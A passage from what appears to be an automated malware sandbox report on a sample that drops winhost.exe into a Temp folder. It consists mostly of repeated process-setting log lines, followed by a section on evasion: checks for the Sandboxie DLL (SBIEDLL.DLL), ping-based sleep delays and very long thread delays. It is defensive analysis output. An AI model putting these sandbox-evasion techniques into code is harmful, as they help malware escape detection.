                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: winhost.exe, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeBinary or memory string: SBIEDLL.DLL
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLH
                  Source: winhost.exe, 00000010.00000002.722800429.000000001EBC6000.00000004.00000001.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\TEMP\MICROSOFT\MYCLIENT\SBIEDLL.DLL
                  Source: winhost.exe, 00000010.00000002.722800429.000000001EBC6000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\ONDEMANDCONNROUTEHELPER.DLLPS\SBIEDLL.DLL
                  Source: winhost.exe, 00000008.00000003.674464515.000000001E818000.00000004.00000001.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS\SBIEDLL.DLLL.DLL
                  Source: winhost.exe, 00000008.00000002.675815876.0000000000D68000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\ONDEMANDCONNROUTEHELPER.DLLIENT\SBIEDLL.DLL
                  Uses ping.exe to sleepShow sources
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 6780Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 4600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 768Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 5776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 6016Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 7032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 5888Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 7020Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 6420Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 5072Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeThread delayed: delay time: 922337203685477Jump to behavior
